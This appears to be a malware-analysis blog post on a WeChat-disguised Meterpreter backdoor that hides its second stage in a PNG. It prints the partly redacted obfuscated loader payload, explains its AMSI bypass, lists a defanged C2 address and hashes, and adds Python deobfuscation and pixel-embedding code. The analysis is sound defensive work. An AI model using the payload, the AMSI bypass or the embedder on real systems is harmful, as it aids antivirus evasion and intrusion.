꿈을꾸는 파랑새

Today we look at a piece of malware that abuses steganography: a Meterpreter backdoor (2024.5.29).
The sample's distinguishing trait is that it disguises itself with a WeChat icon.
It is a .NET application that carries a PowerShell script as a Base64 string inside its main function, decodes that string as UTF-8 and executes the result.

PowerShell payload embedded in the malware

Base64 code embedded in the malware, viewed in dnSpy

// dnSpy decompilation of the loader's main function; "?" marks Base64 characters the post redacts
string @string = Encoding.UTF8.GetString(Convert.FromBase64String("U0VUICAoInswfX
sxfSItZicycUYnLCd4QScpICAoIFt0eVBlXSgiezV9ezN9ezZ9ezJ9ezd9ezl9ezR9ezExfXsxfXswfXs4fXsxM
H0iIC1mJ21BUnMnLCcuJywnTnRJTWUuSW5UZXInLCdTJywnaUMnLCdzWScsJ1RFTS5yVScsJ29QU0VSJywnaEEn
LCdWJywnTCcsJ0VTJykgKSAgOyRDVksgPSBbVFlQZV0oInswfXsxfSIgLUYnUicsJ2VGJykgIDske0Zgd2l9PSAoIGdF
dC1WQXJJQUJMR??????xfSItZicyJywncW????????OTHkgICk6OigiezF9ezN9ezB9ezJ9Ii1mICdI
R2xvJywnQWxsbycsJ2JhbCcsJ2MnKS5JbnZva2UoKDkwNzYrO???MDkyKSk7JEN2ay4iYXNTYGVNYEJMeSIuIk
dlVHR5YFBlIigiU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi??????2NSkrW2NIYVJdKFtieVRlXT
B4NmQpK1tDaGFSXShbQnlUZV0weDczKStbQ0hhUl0oW0JZdGVdMHg2OSkrW0NIYVJdKDg1KjMxLzMxKStbY0hBUl0o
W2J5dGVdMHg3NCkrW2NIQVJdKDEwNSkrW2NIYXJdKDEwOCkrW0NoYXJdKDExNSszOS0zOSkpIikuImdFYFRgRkll
TEQiKCIkKCfDoG1zw6xTZXNzw67DtW4nLk5vUk1BTGlaShbY2hh??????TQpK1tjSGFSXSgxMTEp
K1tjSGFyXSgxMTQrMjQtMjQpK1tjaGFSXSgxMDYrMykrW2N??Y4KzI2LTI2KSkgLXJlcGxhY2UgW0NIQV
JdKDI0KzY4KStb???oW0J5dEVdMHg3MCkrW0NIYXJdKFtiWXRFXTB4N2IpK1tjSEFyXSg3Nys0NS00NSkrW2NoYVJd
KDYyKzQ4KStbQ0hBUl0???????xOC8xMTgpKSIsICgiezF9ezN9ezB9ezR9ezJ9Ii1mJ2ljLCcsJ05vbic
sJ2ljJywnUHVibCcsJ1N0YXQnK?????7Mn17MX17MH0iLWYnbHVlJywnZXRWYScsJ1MnKS5JbnZva2UoJHtu
VWBMbH0sICR7bnVgbEx9KTsgJGN2ay4iYXNzZW1gQmBMeSIuImdgZXR0YFlQRSIoIlN5c3RlbS5NYW5hZ2VtZW
50LkF1dG9tYXRpb24uJChbY0??????????NjUpK1tjSGFSXShbYnlUZV0weDZkKStbQ2hhUl0oW0J5VGVdMHg3Mykr
0NIYVJdKFtCWXRlXTB4NjkpK1tDSGFSXS?????MS8zMSkrW2NIQVJdKFtieXRlXTB4NzQpK1tjSEFSXSgxMDU
pK1tjSGFyXSgxMDgpK1tDaGFyXSgx?????rMzktMzkpKSIpLiJnYEV0ZklgRUxkIigiJChbY2hhcl0oW2JZdEVdM
Hg2MSkrW0NoYVJdKFtCWXRlXTB4NmQpK??????FyXSg1NSs2MCkrW2NoQXJdKDEwNSs5Ny05NykrW0NI......
.OjoiYXNgQ2lpIi4iR2VgVHN0c???kciKCR7T31bMC4uMzU5OF0pKQ=="));
if (!string.IsNullOrEmpty(text))
{
    File.WriteAllText(text, @string);
    return 0;
}

Malware analysis

1. @string: the PowerShell script
text: the file path
File.WriteAllText(text, @string) drops the script at that path; everything that follows runs inside the PowerShell script (@string).
2. Detailed analysis of the PowerShell payload
2-1. Obfuscation
Every variable, function, type and field name is assembled at run time from string pieces ("{0}{1}" -f 'a','b', [char](65+...)) or hidden behind Base64.
The aim is to stretch analysis time and dodge signature-based detection; it still gets detected in the end.
2-2. AMSI bypass (Antimalware Scan Interface bypass)
AmsiUtils is the internal class in System.Management.Automation through which PowerShell hands script content to AMSI, the interface antivirus engines use to scan it.
Its fields amsiContext, amsiSession and so on are reached by reflection and forced to null or to a chosen value.
Every script PowerShell runs is subject to an AMSI scan, so once these fields are broken in the current process the later stages go through unscanned.
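A small resolver for the three obfuscation tricks named in 2-1 (backtick-split member names, [char] arithmetic behind casts, and "-f" format-string reordering), followed by the check you would run on its output for the AMSI tampering described in 2-2. This is an added example in Python; it is not the post's code and not the sample's script. The SAMPLE string is constructed in the style of the payload so that it resolves to the AmsiUtils/amsiSession reflection call, and amsiInitFailed in the indicator list is a field the post does not name.

```python
import ast
import operator
import re

# Constructed sample written in the style of the post's payload: backtick-split
# member names, [char] arithmetic behind [byte]/hex casts, and "-f" format
# reordering. It is not the sample's real script, only the same three tricks.
SAMPLE = (
    '[Ref]."asS`eM`BLy"."GeTTy`Pe"("System.Management.Automation.$('
    "[char](65)+[cHaR]([byTe]0x6d)+[ChaR]([ByTe]0x73)+[CHaR]([BYte]0x69)"
    "+[CHaR](85*31/31)+[cHAR]([byte]0x74)+[cHAR](105)+[cHAr](108)"
    '+[ChAr](115+39-39))")."gE`T`FIeLD"('
    "(\"{2}{1}{0}\"-f'on','iSessi','ams'),"
    "(\"{1}{3}{0}{4}{2}\" -F 'ic,','Non','ic','Publ','Stat'))"
)

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def _arith(node):
    """Evaluate + - * / over numeric literals only: no names, calls or attributes."""
    if isinstance(node, ast.Expression):
        return _arith(node.body)
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        return _OPS[type(node.op)](_arith(node.left), _arith(node.right))
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -_arith(node.operand)
    raise ValueError("unsupported expression: %s" % ast.dump(node))


def resolve_char(expr):
    """'[byTe]0x6d' -> 'm', '85*31/31' -> 'U'. PowerShell casts such as [byte] are dropped."""
    expr = re.sub(r"\[\w+\]", "", expr)
    return chr(int(_arith(ast.parse(expr, mode="eval"))))


CHAR_RE = re.compile(r"\[char\]\(([^()]*)\)", re.IGNORECASE)   # [cHaR](...) without nested parens
FMT_RE = re.compile(r"""\(\s*"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)""", re.IGNORECASE)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")             # 'a'+'b' -> 'ab'
SUBEXPR_RE = re.compile(r"\$\('([^']*)'\)")                       # $('abc') -> abc


def _reorder(m):
    order = re.findall(r"\{(\d+)\}", m.group(1))
    args = re.findall(r"'([^']*)'", m.group(2))
    return "'" + "".join(args[int(i)] for i in order) + "'"


def deobfuscate(script):
    """Rewrite until nothing changes; each pass folds one layer of indirection."""
    # "asS`eM`BLy" -> "asSeMBLy"; the real escapes `n `t `r `0 are left alone
    text = re.sub(r"`(?![ntr0])", "", script)
    while True:
        new = CHAR_RE.sub(lambda m: "'" + resolve_char(m.group(1)) + "'", text)
        new = FMT_RE.sub(_reorder, new)
        new = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", new)
        new = SUBEXPR_RE.sub(lambda m: m.group(1), new)
        if new == text:
            return text
        text = new


# What to grep for once the names are readable. amsiInitFailed is not named in the
# post; it is the other AmsiUtils field this kind of bypass commonly flips.
AMSI_INDICATORS = ("AmsiUtils", "amsiSession", "amsiContext", "amsiInitFailed", "NonPublic,Static")


def amsi_tamper_indicators(script):
    """Return the AMSI-tampering strings visible in the deobfuscated script (case-insensitive)."""
    clean = deobfuscate(script).lower()
    return [s for s in AMSI_INDICATORS if s.lower() in clean]


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(amsi_tamper_indicators(SAMPLE))
```

The resolver deliberately evaluates only literal arithmetic through the ast module, never the script itself, so it is safe to point at hostile input; anything it cannot fold (nested parentheses inside [char](...), double-quoted -f arguments) is left untouched for the analyst.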

Image file download from 121

3. Download of an external PNG file
sal a New-Object: Set-Alias makes a an alias of New-Object, so a stands in for the constructor call in the rest of the script
System.Drawing.Bitmap is used to open the image
Download server: 121.37.221[.]98:11111
4. Extraction and execution of the steganographic payload inside the image
Image size: 1920x2 = 3840 pixels (coordinates x=0~1919, y=0~1), so at most 3840 hidden bytes, one per pixel
Each hidden byte is rebuilt from the low 4 bits of a pixel's B and G channels:
-band 15 = AND 15, i.e. keep only the low 4 bits
B channel: low 4 bits, multiplied by 16 (shifted left by 4) to become the high nibble
G channel: low 4 bits, kept as the low nibble

Decoding the Base64 embedded in the malware

OR-ing the two nibbles rebuilds one byte; repeating this across the pixels restores the second-stage malware hidden in the image.
5. Extracting and executing the malware from the restored bytes
The byte array $o[0..3598] is converted to an ASCII string (a script, code, shellcode and so on)
It is executed immediately with iex (Invoke-Expression)
The part that holds the malicious code is blurred out here
The byte array becomes a second-stage PowerShell script that carries yet another Base64 string, and that string is additionally XOR-encoded
Decoding the XOR-ed Base64 string makes it easy to read the User-Agent string the malware uses for its connection and the C2 IP address

Decoding the XOR-ed Base64 string
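The extraction in step 4 and the stage-2 unwrapping in step 5, as an added example in Python; it is not the post's code and not the sample's PowerShell. It works on a list of (R, G, B) tuples instead of a real PNG, generalises the decoder into an embed/extract pair so the nibble arithmetic can be verified round-trip, and shows how a one-byte XOR key is recovered from a crib when the stage-2 Base64 turns up. The x-outer/y-inner pixel order, the single-byte XOR, the key 0x35, the PowerShell one-liner wrapper and the TEST-NET address standing in for the C2 are all constructed here; only the image geometry, the B/G nibble scheme and the User-Agent string come from the post.

```python
import base64
import re

# Added example, not the sample's PowerShell or the post's code. Pixels are
# (R, G, B) tuples in a row-major list; with Pillow you would get the same
# list via list(Image.open(path).convert("RGB").getdata()).
WIDTH, HEIGHT = 1920, 2  # 3840 pixels, one hidden byte per pixel, as in the post


def _pixel_index(i, width, height):
    """Payload byte i lives at x = i // height, y = i % height (x=0..1919, y=0..1).
    The x-outer/y-inner order is an assumption about the stager; the post only gives the ranges."""
    x, y = divmod(i, height)
    return y * width + x


def embed(cover, payload, width=WIDTH, height=HEIGHT):
    """Hide payload: each byte's high nibble goes into B's low 4 bits, its low nibble into G's."""
    if len(payload) > width * height:
        raise ValueError("payload of %d bytes exceeds %d-pixel capacity" % (len(payload), width * height))
    out = list(cover)
    for i, byte in enumerate(payload):
        idx = _pixel_index(i, width, height)
        r, g, b = out[idx]
        out[idx] = (r, (g & 0xF0) | (byte & 0x0F), (b & 0xF0) | (byte >> 4))
    return out


def extract(pixels, length, width=WIDTH, height=HEIGHT):
    """The decoder the post walks through: (B -band 15) * 16 -bor (G -band 15)."""
    data = bytearray()
    for i in range(length):
        _, g, b = pixels[_pixel_index(i, width, height)]
        data.append(((b & 15) << 4) | (g & 15))
    return bytes(data)


def xor_bytes(data, key):
    return bytes(x ^ key for x in data)


def recover_single_byte_xor(blob, crib=b"Mozilla/"):
    """Brute-force a one-byte XOR key: only the right key makes the crib show up in the output."""
    for key in range(256):
        plain = xor_bytes(blob, key)
        if crib in plain:
            return key, plain
    raise ValueError("no single-byte key yields the crib")


def longest_base64_run(script):
    """Pull the longest Base64-looking token out of a recovered stage-2 script."""
    return max(re.findall(rb"[A-Za-z0-9+/]{32,}={0,2}", script), key=len)


def analyze_stage2(pixels, length):
    """Pixels -> stage-2 script -> Base64 blob -> XOR key and config. Returns (key, config)."""
    script = extract(pixels, length)
    return recover_single_byte_xor(base64.b64decode(longest_base64_run(script)))


# --- constructed demo data: a stage-2 one-liner carrying an XOR-ed Base64 config ---
DEMO_KEY = 0x35                       # arbitrary; the real key is whatever the stager uses
DEMO_CONFIG = (b"User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0)\n"
               b"C2: 198.51.100.7:11111\n")   # UA string from the post; TEST-NET address stands in for the C2
DEMO_STAGE2 = (b"$b=[Convert]::FromBase64String('" + base64.b64encode(xor_bytes(DEMO_CONFIG, DEMO_KEY))
               + b"');for($i=0;$i -lt $b.Length;$i++){$b[$i]=$b[$i] -bxor %d}" % DEMO_KEY)
DEMO_COVER = [(0x80, 0x7F, 0x41)] * (WIDTH * HEIGHT)   # flat 1920x2 cover image


def demo():
    stego = embed(DEMO_COVER, DEMO_STAGE2)
    return analyze_stage2(stego, len(DEMO_STAGE2))


if __name__ == "__main__":
    key, config = demo()
    print("xor key 0x%02x" % key)
    print(config.decode())
```

Because only the low nibble of two channels is touched, the cover's high nibbles survive and the image looks unchanged, which is why a 1920x2 strip can carry a full stager without drawing attention; on a real capture you would feed the PNG's pixel list into extract() with length 3599 to match the $o[0..3598] slice the post shows.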

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0)
C2: 121.37.221[.]98
File name: wechat.exe
Size: 1 MB
MD5: 58a728da4e405ca979e73e774fe72fb9
SHA-1: 33bfff315ba2bdef39002d8cc066b513cfe70aae
SHA-256: 6f4571882606ee838590243876609effc6a78455fde3a908ed9f9220758c8eb9
Malware is being spread this way as well, so it pays to stay careful; a sample like this can be expected to be used for stealing personal information.
